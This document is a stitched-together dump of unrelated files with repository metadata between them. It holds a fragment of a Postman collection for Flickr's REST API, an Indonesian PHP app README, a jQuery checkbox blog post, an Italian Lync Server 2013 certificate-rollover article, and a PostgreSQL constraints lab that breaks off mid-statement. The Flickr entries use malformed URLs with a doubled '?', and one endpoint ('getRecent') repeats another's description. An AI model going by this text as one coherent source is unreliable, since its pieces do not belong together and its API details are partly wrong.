"http://api.flickr.com/services/rest/?method=flickr.photos.getFavorites?api_key=%7B%7D&format=%7B%7D&page=%7B%7D&per_page=%7B%7D&photo_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns the list of people who have favorited a given photo." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "8cbfaf6e-a133-4412-a042-66357fd28347" } ] }, { "id": "9b2fda47-3906-4599-80e9-7d5b8d2d7f11", "name": "getRestMethodFlickr.photos.getinfo", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getInfo?api_key=%7B%7D&format=%7B%7D&photo_id=%7B%7D&secret=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Get information about a photo. The calling user must have permission to view the photo." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "33c5eb2e-7552-455b-a5b9-de4ac6d6284f" } ] }, { "id": "2ab5ec48-6250-4d8d-bfac-67e0f42700b5", "name": "getRestMethodFlickr.photos.getnotinset", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getNotInSet?api_key=%7B%7D&extras=%7B%7D&format=%7B%7D&max_taken_date=%7B%7D&max_upload_date=%7B%7D&media=%7B%7D&min_taken_date=%7B%7D&min_upload_date=%7B%7D&page=%7B%7D&per_page=%7B%7D&privacy_filter=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns a list of your photos that are not part of any sets." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "dc1d2a16-3597-404d-9bbe-b90d273de686" } ] }, { "id": "04131e51-9275-405c-9978-dd31960352a7", "name": "getRestMethodFlickr.photos.getperms", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getPerms?api_key=%7B%7D&format=%7B%7D&photo_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Get permissions for a photo." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "f06928c0-7414-448a-a3d5-5b48c414b34c" } ] }, { "id": "a1d29819-9024-4d91-9d02-73b1ede530dd", "name": "getRestMethodFlickr.photos.getrecent", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getRecent?api_key=%7B%7D&extras=%7B%7D&format=%7B%7D&page=%7B%7D&per_page=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns the list of people who have favorited a given photo." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "2db98596-abe0-48b1-ad8e-dbc1a413619f" } ] }, { "id": "7bc87e44-3b98-4731-9965-161a9f681e17", "name": "getRestMethodFlickr.photos.getsizes", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getSizes?api_key=%7B%7D&format=%7B%7D&photo_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns the available sizes for a photo. The calling user must have permission to view the photo." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "7cdc2841-32b1-40f1-b9fd-a0ff717e9f56" } ] }, { "id": "c2cb4cfc-c3f1-49ed-a0f3-3c416a18b5fc", "name": "getRestMethodFlickr.photos.getuntagged", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getUntagged?api_key=%7B%7D&extras=%7B%7D&format=%7B%7D&max_taken_date=%7B%7D&max_upload_date=%7B%7D&media=%7B%7D&min_taken_date=%7B%7D&min_upload_date=%7B%7D&page=%7B%7D&per_page=%7B%7D&privacy_filter=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns a list of your photos that are not tagged." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "03df0acb-6cf5-4bb0-a053-2066d0db5adf" } ] }, { "id": "833d10fb-3970-4249-9dc6-2da2947314b6", "name": "getRestMethodFlickr.photos.getwithgeodata", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getWithGeoData?api_key=%7B%7D&extras=%7B%7D&format=%7B%7D&max_taken_date=%7B%7D&max_upload_date=%7B%7D&media=%7B%7D&min_taken_date=%7B%7D&min_upload_date=%7B%7D&page=%7B%7D&per_page=%7B%7D&privacy_filter=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns a list of your geo-tagged photos." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "7d888c37-9195-4b97-8e49-fe7827264d12" } ] }, { "id": "fd819c06-46df-44dd-bd02-2d762ee0a42c", "name": "getRestMethodFlickr.photos.getwithoutgeodata", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getWithoutGeoData?api_key=%7B%7D&extras=%7B%7D&format=%7B%7D&max_taken_date=%7B%7D&max_upload_date=%7B%7D&media=%7B%7D&min_taken_date=%7B%7D&min_upload_date=%7B%7D&page=%7B%7D&per_page=%7B%7D&privacy_filter=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns a list of your photos which haven't been geo-tagged." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "425af3d7-6611-4cba-9e25-7e8dc21e78a1" } ] }, { "id": "816548d3-96a4-428b-9097-a8602bbf53a8", "name": "getRestMethodFlickr.photos.getrecentlyupdated", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getRecentlyUpdated?api_key=%7B%7D&extras=%7B%7D&format=%7B%7D&min_date=%7B%7D&page=%7B%7D&per_page=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Return a list of your photos that have been recently created or which have been recently modified. Recently modified may mean that the photo's metadata (title, description, tags) may have been changed or a comment has been added (or just modified somehow :-)" }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "f0b6a5d6-0cac-4ed3-8dc9-bdea4367c592" } ] }, { "id": "a46b3757-c660-4dd9-8837-3833a6839662", "name": "postRestMethodFlickr.photos.removetag", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.removeTag?api_key=%7B%7D&photo_id=%7B%7D&tag_id=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Remove a tag from a photo." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "a137c085-fd9c-4086-a89b-2883681c3825" } ] }, { "id": "c30a2c77-dec1-45f0-81fb-121853292eaa", "name": "getRestMethodFlickr.photos.search", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.search?accuracy=%7B%7D&api_key=%7B%7D&contacts=%7B%7D&content_type=%7B%7D&extras=%7B%7D&format=%7B%7D&geo_context=%7B%7D&group_id=%7B%7D&has_geo=%7B%7D&hbox=%7B%7D&is_commons=%7B%7D&is_gallery=%7B%7D&is_getty=%7B%7D&lat=%7B%7D&license=%7B%7D&lon=%7B%7D&machine_tags=%7B%7D&machine_tag_mode=%7B%7D&max_taken_date=%7B%7D&max_upload_date=%7B%7D&media=%7B%7D&min_taken_date=%7B%7D&min_upload_date=%7B%7D&page=%7B%7D&per_page=%7B%7D&place_id=%7B%7D&privacy_filter=%7B%7D&radius=%7B%7D&radius_units=%7B%7D&safe_search=%7B%7D&sort=%7B%7D&tags=%7B%7D&tag_mode=%7B%7D&text=%7B%7D&user_id=%7B%7D&woe_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Return a list of photos matching some criteria. Only photos visible to the calling user will be returned. To return private or semi-private photos, the caller must be authenticated with 'read' permissions, and have permission to view the photos. Unauthenticated calls will only return public photos." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "c1ce3353-1737-49e3-9f1a-39d12c9e9c7a" } ] }, { "id": "3f396c6c-b15b-467f-a82f-5807ead16b87", "name": "postRestMethodFlickr.photos.setcontenttype", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.setContentType?api_key=%7B%7D&content_type=%7B%7D&photo_id=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Set the content type of a photo." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "9487047a-3708-49e7-b831-09b6eca4316b" } ] }, { "id": "d9fc606a-967c-46c8-94e9-60590b9f88bc", "name": "postRestMethodFlickr.photos.setdates", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.setDates?api_key=%7B%7D&date_posted=%7B%7D&date_taken=%7B%7D&date_taken_granularity=%7B%7D&photo_id=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Set one or both of the dates for a photo." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "5f0cc28c-2ada-4090-be42-fb8c3fcf40e8" } ] }, { "id": "5896936d-9cab-48c2-8f74-214259541231", "name": "postRestMethodFlickr.photos.setmeta", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.setMeta?api_key=%7B%7D&description=%7B%7D&photo_id=%7B%7D&title=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Set the meta information for a photo." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "91f264d8-8f7d-499a-affd-ff36726fb4bf" } ] }, { "id": "ee401d1c-2ab6-4e1f-8fc4-314bd1d00bf5", "name": "postRestMethodFlickr.photos.setperms", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.setPerms?api_key=%7B%7D&format=%7B%7D&is_family=%7B%7D&is_friend=%7B%7D&is_public=%7B%7D&perm_addmeta=%7B%7D&perm_comment=%7B%7D&photo_id=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Set permissions for a photo." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "e7a4aeb2-f281-4859-8fb5-351b55743e5c" } ] }, { "id": "a7d16e16-a168-49ff-9a3a-46e185478abf", "name": "postRestMethodFlickr.photos.setsafetylevel", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.setSafetyLevel?api_key=%7B%7D&format=%7B%7D&hidden=%7B%7D&photo_id=%7B%7D&safety_level=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Set the safety level of a photo." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "503d2c44-1169-4eb0-a0da-b955963997c6" } ] }, { "id": "ceea479e-988e-4fbb-803e-5b96cad77ecd", "name": "postRestMethodFlickr.photos.settags", "request": { "url": "http://api.flickr.com/services/res
38.302162
680
0.467674
eng_Latn
0.148992
485428b7c2f6df83a9df83bcef46d21fdf5d8146
997
md
Markdown
README.md
Tundra-hub/UTS-intpubL
26ac951576a626e06a2180ba434845a5cb5fc7d6
[ "MIT" ]
null
null
null
README.md
Tundra-hub/UTS-intpubL
26ac951576a626e06a2180ba434845a5cb5fc7d6
[ "MIT" ]
null
null
null
README.md
Tundra-hub/UTS-intpubL
26ac951576a626e06a2180ba434845a5cb5fc7d6
[ "MIT" ]
null
null
null
# Aplikasi sederhana manajemen surat dengan PHP MySQLi Aplikasi ini untuk mengelola pencatatan surat masuk dan surat keluar (disposisi). Dilengkapi beberapa fitur, antara lain : - Cetak disposisi surat masuk - Cetak agenda surat masuk dan keluar berdasarkan tanggal tertentu - Upload lampiran file surat, baik file scan/gambar(.JPG, .PNG) serta file dokumen (.DOC, .DOCX dan .PDF) - Fitur galeri file lampiran yang diupload - Upload kode klasifikasi surat format *.CSV (file excel) - Multilevel user - Fitur backup dan restore database Sebelum menggunakan aplikasi ini silakan atur konfigurasi database terlebih dahulu. Caranya, - Buka folder **include** lalu edit file **config.php** lalu sesuaikan `username`, `password` dan `database` dengan yang Anda gunakan. Untuk tampilan terbaik, gunakan browser Google Chrome versi terbaru. Inspired by Nur Akhwam. --- Ini adalah source code dari postingan https://masrud.com/post/aplikasi-manajemen-surat-php-mysqli # UTS-intpubL
39.88
134
0.774323
ind_Latn
0.876761
485444dc5a796e678b8ebfec3990935e5d75be51
1,472
md
Markdown
_posts/2011-05-18-reliable-javascript-checkbox-events.md
luxagen/timwise.co.uk
2a959d19c9b14f44c569ff3f73201319c7cb6fef
[ "MIT" ]
null
null
null
_posts/2011-05-18-reliable-javascript-checkbox-events.md
luxagen/timwise.co.uk
2a959d19c9b14f44c569ff3f73201319c7cb6fef
[ "MIT" ]
5
2019-07-18T08:11:48.000Z
2021-12-07T14:33:20.000Z
_posts/2011-05-18-reliable-javascript-checkbox-events.md
luxagen/timwise.co.uk
2a959d19c9b14f44c569ff3f73201319c7cb6fef
[ "MIT" ]
6
2019-07-17T18:32:34.000Z
2021-12-19T10:56:24.000Z
--- layout: post title: Reliable javascript checkbox events date: '2011-05-18T22:30:00.004Z' author: Tim Abell tags: - dhtml - javascript - html - jQuery - web modified_time: '2011-05-18T23:24:56.428Z' thumbnail: http://farm4.static.flickr.com/3652/5734606641_c61a818d47_t.jpg blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7525465672135952518 blogger_orig_url: https://timwise.blogspot.com/2011/05/reliable-javascript-checkbox-events.html --- [![](http://farm4.static.flickr.com/3652/5734606641_c61a818d47_m.jpg)](http://www.flickr.com/photos/tim_abell/5734606641/) Some sites have checkboxes which show/hide another element when you click them. This a handy feature, but not all sites take into account the fact that firefox remembers the contents of a form when you reload the page (this is a good thing). So here's how you avoid that with jQuery: <script type="text/javascript"> $(function() { // initialise show/hide to match the checkbox value $('.targetelements').toggle($('#mycheckbox').attr('checked')); // attach click handler for show/hide to checkbox $('#mycheckbox').click(function(){ $('.targetelements').toggle(this.checked);}) }); </script> Simples! You could use the same principle without jQuery if you need to. Simply read the value of the checkbox with javascript the old fashioned way before deciding whether to hide when you initialise you page.
42.057143
243
0.726902
eng_Latn
0.820051
48545dfc0b2849bf2f08db4edcaec5f8bc778c0e
107
md
Markdown
README.md
alesf/WalaGoggles
d4c0fe03057f3f2caec083a78459a876101d3d0d
[ "MIT" ]
3
2020-03-22T10:16:34.000Z
2020-03-25T05:11:29.000Z
README.md
alesf/WalaGoggles
d4c0fe03057f3f2caec083a78459a876101d3d0d
[ "MIT" ]
null
null
null
README.md
alesf/WalaGoggles
d4c0fe03057f3f2caec083a78459a876101d3d0d
[ "MIT" ]
1
2020-03-22T13:13:32.000Z
2020-03-22T13:13:32.000Z
# WalaGoggles These are safety goggles for emergency use when the regular supplies are no longer available
35.666667
92
0.831776
eng_Latn
0.999873
485467e0290dd1f58e0940da8c415bdc5c499f57
14,396
md
Markdown
server-2013/lync-server-2013-staging-av-and-oauth-certificates-using-roll-in-set-cscertificate.md
Devil5140/OfficeDocs-SkypeforBusiness-Test-pr.it-it
2dcdbc783c72f9d5e030d087228d9ea736160f7a
[ "CC-BY-4.0", "MIT" ]
1
2020-05-19T19:28:21.000Z
2020-05-19T19:28:21.000Z
server-2013/lync-server-2013-staging-av-and-oauth-certificates-using-roll-in-set-cscertificate.md
Devil5140/OfficeDocs-SkypeforBusiness-Test-pr.it-it
2dcdbc783c72f9d5e030d087228d9ea736160f7a
[ "CC-BY-4.0", "MIT" ]
23
2018-04-26T18:32:18.000Z
2018-08-24T18:08:56.000Z
server-2013/lync-server-2013-staging-av-and-oauth-certificates-using-roll-in-set-cscertificate.md
Devil5140/OfficeDocs-SkypeforBusiness-Test-pr.it-it
2dcdbc783c72f9d5e030d087228d9ea736160f7a
[ "CC-BY-4.0", "MIT" ]
14
2018-06-19T11:13:22.000Z
2020-10-01T07:09:00.000Z
--- title: "Lync Server 2013: Gest. Temp. certificati AV e OAuth c/ -Roll in Set-CsCertificate" TOCTitle: "Lync Server 2013: Gest. Temp. certificati AV e OAuth c/ -Roll in Set-CsCertificate" ms:assetid: 22dec3cc-4b6b-4df2-b269-5b35df4731a7 ms:mtpsurl: https://technet.microsoft.com/it-it/library/JJ660292(v=OCS.15) ms:contentKeyID: 49887477 ms.date: 08/24/2015 mtps_version: v=OCS.15 ms.translationtype: HT --- # Gestione temporanea dei certificati AV e OAuth utilizzando -Roll in Set-CsCertificate in Lync Server 2013   _**Ultima modifica dell'argomento:** 2012-11-13_ Le comunicazioni audio/video (A/V) sono un componente chiave di Microsoft Lync Server 2013. Funzionalità quali la condivisione di applicazioni e le audio e videoconferenze si basano sui certificati assegnati al servizio A/V Edge, in particolare al servizio di autenticazione A/V. > [!IMPORTANT] > <ol> > > <li><p>Questa nuova funzionalità è progettata per il certificato del servizio A/V Edge e <em>OAuthTokenIssuer</em>. È possibile fornire altri tipi di certificati con il servizio A/V Edge e il tipo di certificato OAuth, ma essi non potranno sfruttare il comportamento di coesistenza come il certificato del servizio A/V Edge.</p></li> > > > <li><p>I cmdlet Lync Server Management Shell PowerShell utilizzati per gestire i certificati di Microsoft Lync Server 2013 fanno riferimento al certificato del servizio A/V Edge come tipo di certificato <em>AudioVideoAuthentication</em> e al certificato OAuthServer come tipo <em>OAuthTokenIssuer</em>. Per identificare in modo univoco i certificati e nel resto dell'argomento, si farà riferimento a questi certificati con lo stesso tipo di identificatore, <em>AudioVideoAuthentication</em> e <em>OAuthTokenIssuer</em>.</p></li></ol> Il servizio di autenticazione A/V è responsabile dell'emissione di token utilizzati dai client e altri consumer A/V. I token vengono generati da attributi sul certificato e la scadenza del certificato ha come conseguenza la perdita di connessione e il requisito di partecipare di nuovo con un nuovo token generato dal nuovo certificato. Questo problema viene alleviato grazie a una nuova funzionalità di Lync Server 2013: la possibilità di gestire temporaneamente un nuovo certificato prima della scadenza di quello vecchio e consentire a entrambi di continuare a funzionare per un periodo di tempo. Questa funzionalità utilizza la funzionalità aggiornata nel cmdlet di Lync Server Management Shell Set-CsCertificate. Il nuovo parametro -Roll, con il parametro esistente -EffectiveDate, collocherà il nuovo certificato AudioVideoAuthentication nell'archivio certificati. Il vecchio certificato AudioVideoAuthentication rimane disponibile per la convalida dei token emessi. Con l'attivazione del nuovo certificato AudioVideoAuthentication si verificano gli eventi seguenti: > [!TIP] > Utilizzando i cmdlet di Lync Server Management Shell per gestire i certificati, è possibile richiedere certificati separati e distinti per ogni scopo nel server perimetrale. La Creazione guidata certificati nella Distribuzione guidata di Lync Server è utile per creare certificati, ma si tratta in genere del tipo <strong>predefinito</strong> che associa tutti gli utilizzi dei certificati per il server perimetrale in un singolo certificato. Se si intende utilizzare la funzionalità di certificati in sequenza, la procedura consigliata consiste nel disassociare il certificato AudioVideoAuthentication dagli scopi degli altri certificati. È possibile effettuare il provisioning e gestire temporaneamente un certificato di tipo predefinito, ma solo la parte AudioVideoAuthentication del certificato combinato sfrutterà i vantaggi della gestione temporanea. Ad esempio, un utente che partecipa a una conversazione di messaggistica istantanea, alla scadenza del certificato dovrà disconnettersi e riconnettersi per utilizzare il nuovo certificato associato al servizio Access Edge. Un comportamento analogo si ha nel caso di un utente che partecipa a una conferenza Web utilizzando il servizio Web Conferencing Edge. Il certificato OAuthTokenIssuer è un tipo specifico condiviso in tutti i server. Il certificato viene creato e gestito in una sola posizione ed è archiviato nell'archivio di gestione centrale per tutti i server. Per comprendere appieno le opzioni e i requisiti relativi all'uso del cmdlet Set-CsCertificate e alla gestione temporanea di certificati tramite tale cmdlet prima della scadenza del certificato corrente, sono necessarie altre informazioni. Il parametro -Roll è importante, ma ha essenzialmente un solo scopo. Se viene definito come parametro, si segnala a Set-CsCertificate che verranno fornite informazioni sul certificato interessato definite da -Type (ad esempio AudioVideoAuthentication e OAuthTokenIssuer), quando il certificato diventerà effettivo in base alla definizione di -EffectiveDate. **-Roll:** il parametro -Roll è obbligatorio e dispone di dipendenze che devono essere fornite con esso. Parametri obbligatori per definire completamente quali certificati saranno interessati e come saranno applicati: **-EffectiveDate:** il parametro -EffectiveDate definisce quando il nuovo certificato sarà -attivo insieme al certificato corrente. Il parametro -EffectiveDate può essere vicino all'ora di scadenza del certificato corrente oppure corrispondere a un periodo di tempo più lungo. Un valore minimo consigliato per -EffectiveDate per il certificato AudioVideoAuthentication è di 8 ore, ovvero la durata predefinita del token per i token del servizio A/V Edge emessi utilizzando il certificato AudioVideoAuthentication. Quando si gestiscono temporaneamente certificati OAuthTokenIssuer, esistono diversi requisiti per il tempo di anticipo prima che il certificato diventi effettivo. Il tempo di anticipo minimo per il certificato OAuthTokenIssuer è di 24 ore prima dell'ora di scadenza del certificato corrente. Il tempo di anticipo prolungato per la coesistenza è dovuto ad altri ruoli del server dipendenti dal certificato OAuthTokenIssuer (ad esempio Exchange Server) che ha un periodo di memorizzazione più lungo per i materiali di autenticazione e chiave di crittografia creati dal certificato. **-Thumbprint:** l'identificazione digitale è un attributo univoco per il relativo certificato. Il parametro -Thumbprint è utilizzato per identificare il certificato che sarà interessato dalle azioni del cmdlet Set-CsCertificate. **-Type:** il parametro -Type può accettare un tipo di utilizzo a singolo certificato o un elenco separato da virgola di tipi di utilizzo di certificati. I tipi di certificati identificato lo scopo del certificato per il cmdlet e il server. Ad esempio, il tipo AudioVideoAuthentication è destinato a essere utilizzato dal servizio A/V Edge e dal servizio di autenticazione A/V. Se si decide di gestire temporaneamente ed effettuare il provisioning di certificati di un tipo diverso contemporaneamente, è necessario considerare il più lungo tempo di anticipo effettivo minimo richiesto per i certificati. Ad esempio, è necessario gestire temporaneamente i certificati di tipo AudioVideoAuthentication e OAuthTokenIssuer. Il valore minimo di -EffectiveDate deve essere il maggiore dei due certificati, in questo caso OAuthTokenIssuer, che ha un tempo di anticipo di almeno 24 ore. Se non si desidera gestire temporaneamente il certificato AudioVideoAuthentication con un tempo di anticipo di 24 ore, gestirlo separatamente con un valore di EffectiveDate più adeguato ai requisiti specifici. ## Per aggiornare o rinnovare un certificato servizio A/V Edge con parametri -Roll e -EffectiveDate 1. Accedere al computer locale come membro del gruppo Administrators. 2. Richiedere un rinnovo o un nuovo certificato AudioVideoAuthentication con chiave privata esportabile per il certificato esistente nel servizio A/V Edge. 3. Importare il nuovo certificato AudioVideoAuthentication nel server perimetrale e in tutti gli altri server perimetrale nel pool (se è presente un pool distribuito). 4. Configurare il certificato importato con il cmdlet Set-CsCertificate e utilizzare il parametro -Roll con il parametro -EffectiveDate. La data effettiva deve essere definita come ora di scadenza del certificato corrente (14:00:00 o 2:00:00 PM) meno la durata del token (otto ore per impostazione predefinita). Ciò definisce un'ora in cui impostare il certificato come attivo, che corrisponde a -EffectiveDate \<string\>: “7/22/2012 6:00:00 AM”. > [!IMPORTANT] > Per un pool di server perimetrali, è necessario avere effettuato la distribuzione e il provisioning di tutti i certificati AudioVideoAuthentication entro la data e l'ora definite dal parametro -EffectiveDate del primo certificato distribuito per evitare possibili interruzioni delle comunicazioni A/V a causa della scadenza di un certificato più vecchio prima del rinnovo di tutti i token client e consumer tramite il nuovo certificato. Comando Set-CsCertificate con i parametri -Roll e -EffectiveTime: Set-CsCertificate -Type AudioVideoAuthentication -Thumbprint <thumb print of new certificate> -Roll -EffectiveDate <date and time for certificate to become active> Esempio di comando Set-CsCertificate: Set-CsCertificate -Type AudioVideoAuthentication -Thumbprint "B142918E463981A76503828BB1278391B716280987B" -Roll -EffectiveDate "7/22/2012 6:00:00 AM" > [!IMPORTANT] > È necessario formattare il parametro EffectiveDate secondo le impostazioni di lingua e paese del server. Nell'esempio vengono utilizzate le impostazioni di paese e lingua Inglese (Stati Uniti). Per capire meglio il processo utilizzato da Set-CsCertificate, -Roll e -EffectiveDate per gestire temporaneamente un nuovo certificato per l'emissione di nuovi token AudioVideoAuthentication pur continuando a utilizzare un certificato esistente per convalidare token AudioVideoAuthentication utilizzati dai consumer, è utile servirsi di una sequenza temporale visiva. Nell'esempio seguente, l'amministratore determina che il certificato del servizio A/V Edge scadrà alle 14.00 del 22/07/2012. Richiede e riceve un nuovo certificato e lo importa in ciascun server perimetrale del pool. Alle 2.00 del 22/07/2012 inizia a eseguire Get-CsCertificate con -Roll, -Thumbprint equivalente alla stringa di identificatore digitale del nuovo certificato e -EffectiveTime impostato su 22/07/2012 6.00. Esegue il comando in ogni server perimetrale. ![Uso dei parametri Roll ed EffectiveDate.](images/JJ660292.21d51a76-0d03-4ed7-a37e-a7c14940265f(OCS.15).jpg "Uso dei parametri Roll ed EffectiveDate.") All'ora effettiva (6.00 del 22/7/2012), tutti i nuovi token vengono emessi dal nuovo certificato. Alla convalida, i token verranno prima convalidati rispetto al nuovo certificato e, in caso di esito negativo, verrà effettuato un tentativo con il vecchio certificato. Questo processo che prevede prima l'uso del nuovo certificato e del vecchio certificato come fallback viene ripetuto fino alla scadenza del vecchio certificato. Una volta scaduto il vecchio certificato (22/7/2012 alle 14.00), i token verranno convalidati solo mediante il nuovo certificato. Il vecchio certificato potrà essere rimosso senza problemi utilizzando il cmdlet Remove-CsCertificate con il parametro -Previous. Remove-CsCertificate -Type AudioVideoAuthentication -Previous ## Per aggiornare o rinnovare un certificato OAuthTokenIssuer con parametri -Roll e -EffectiveDate 1. Accedere al computer locale come membro del gruppo Administrators. 2. Richiedere un rinnovo o un nuovo certificato OAuthTokenIssuer con chiave privata esportabile per il certificato esistente nel servizio A/V Edge. 3. Importare il nuovo certificato OAuthTokenIssuer in un Front End Server nel pool (se è presente un pool distribuito). Il certificato OAuthTokenIssuer viene replicato globalmente e deve solo essere aggiornato e rinnovato in ogni server nella distribuzione. Il Front End Server viene utilizzato come esempio. 4. Configurare il certificato importato con il cmdlet Set-CsCertificate e utilizzare il parametro -Roll con il parametro -EffectiveDate. La data effettiva deve essere definita come ora di scadenza del certificato corrente (14:00:00 o 2:00:00 PM) meno un minimo di 24 ore. Comando Set-CsCertificate con i parametri -Roll e -EffectiveTime: Set-CsCertificate -Type OAuthTokenIssuer -Thumbprint <thumb print of new certificate> -Roll -EffectiveDate <date and time for certificate to become active> Esempio di comando Set-CsCertificate: Set-CsCertificate -Type OAuthTokenIssuer -Thumbprint "B142918E463981A76503828BB1278391B716280987B" -Roll -EffectiveDate "7/21/2012 1:00:00 PM" > [!IMPORTANT] > È necessario formattare il parametro EffectiveDate secondo le impostazioni di lingua e paese del server. Nell'esempio vengono utilizzate le impostazioni di paese e lingua Inglese (Stati Uniti). All'ora effettiva (1.00.00 del 21/07/2012), tutti i nuovi token vengono emessi dal nuovo certificato. Alla convalida, i token verranno prima convalidati rispetto al nuovo certificato e, in caso di esito negativo, verrà effettuato un tentativo con il vecchio certificato. Questo processo che prevede prima l'uso del nuovo certificato e del vecchio certificato come fallback viene ripetuto fino alla scadenza del vecchio certificato. Una volta scaduto il vecchio certificato (22/7/2012 alle 14.00), i token verranno convalidati solo mediante il nuovo certificato. Il vecchio certificato potrà essere rimosso senza problemi utilizzando il cmdlet Remove-CsCertificate con il parametro -Previous. Remove-CsCertificate -Type OAuthTokenIssuer -Previous ## Vedere anche #### Concetti [Pianificare i certificati dei server perimetrali in Lync Server 2013](lync-server-2013-plan-for-edge-server-certificates.md) [Gestione dell'autenticazione da server a server (Oauth) e applicazioni partner in Lync Server 2013](lync-server-2013-managing-server-to-server-authentication-oauth-and-partner-applications.md) #### Ulteriori risorse [Configurare i certificati perimetrali per Lync Server 2013](lync-server-2013-set-up-edge-certificates.md) [Set-CsCertificate](https://docs.microsoft.com/en-us/powershell/module/skype/Set-CsCertificate) [Remove-CsCertificate](https://docs.microsoft.com/en-us/powershell/module/skype/Remove-CsCertificate)
122
1,428
0.814254
ita_Latn
0.999306
4854c37e7259af502f5b3ac2f91eb3af14418c14
4,327
md
Markdown
Labs/ddl_dml_lab.md
CSCC-WI/WIIT-7730-8WK
430d82e2a34ba5f4cfb2e15b525d9fa27b9dc2f2
[ "Apache-2.0" ]
1
2018-05-04T02:49:14.000Z
2018-05-04T02:49:14.000Z
Labs/ddl_dml_lab.md
CSCC-WI/WIIT-7730-8WK
430d82e2a34ba5f4cfb2e15b525d9fa27b9dc2f2
[ "Apache-2.0" ]
24
2018-03-15T01:05:50.000Z
2018-05-03T21:44:06.000Z
labs/ddl_dml_lab.md
jrgleason/psql-getting-started
5622a1a955fa37185d5a2824fe65006caf669dba
[ "Apache-2.0" ]
null
null
null
# Table Constraints # ## Introduction ## In this lab we will create a few tables and create *constraints*. These constraints do things like prevent duplication, makes sure values in all the tables are updated appropriately and more. ## Lab ## 1. Reset the database using the following command from the root of the project.<a name="reset-psql"></a> psql -h <AWS_URL> -p <PORT> -U <USER_NAME> <DB_NAME> -a -f ./labs/resources/sql/resetdb.sql 1. Connect to [the RDS instance and coffeeshop db](./creating_rds_instance.md#connect-psql). 1. We would like to track people and provide them with the ability to become a customer which provides incentives such as discounts. To do this we start by creating a `Person` and `Customer` table with the following SQL(#tables-v1). CREATE TABLE MAIN.CUSTOMER( ID SERIAL PRIMARY KEY, DISCOUNT INT ); CREATE TABLE MAIN.PERSON( NAME VARCHAR(20) NOT NULL, EMAIL VARCHAR(20) NOT NULL, CUSTOMER_ID INT REFERENCES MAIN.CUSTOMER(ID) ON UPDATE CASCADE ON DELETE CASCADE, CONSTRAINT USER_KEY PRIMARY KEY (NAME, EMAIL) ); 1. We now have a relationship between the Customer relation and the Person relation. To demonstrate what this means let's try to add a user without a character. To do this run the following... INSERT INTO PERSON VALUES ('John Doe', 'JohnDoe@cscc.edu', 1); Notice the error, this is because there is no customer with the ID of 1. ![DDL DML](./resources/ddl_dml_1.png) 1. To resolve this issue we need to add an Customer **before** adding the Person. To do this use the following SQL... INSERT INTO MAIN.CUSTOMER (DISCOUNT) VALUES (0); You should see the following... > INSERT 0 1 1. Notice we are including the `(DISCOUNT)`, this is because the ID column is generated. So if we are leaving a property undefined we need to declare which properties we are actually setting, in this case that is just *DISCOUNT*. If we were to set both we could alternatively use `INSERT INTO CUSTOMER VALUES (101, 0);` when we want the ID to be *101*. 1. Run `SELECT * FROM CUSTOMER;` and take not of the ID field. 1. Now let's try that User insert again. To do this type the following in the terminal again... INSERT INTO MAIN.PERSON VALUES ('John Dow', 'jd@gmail.com', <ID Value>); Notice this time everything completes and you see the following. > INSERT 0 1 1. Now let's query the PERSON table and see what we have, paste the following select query... SELECT * FROM MAIN.PERSON; Notice the item name | email | customer_id ----------+------------------+------------- John Doe | JohnDoe@cscc.edu | 1 (1 row) 9. Now let's see what **ON UPDATE CASCADE** means, let's say our user wants to change his character's name. To do this we would use the following query... UPDATE MAIN.CUSTOMER SET ID=420 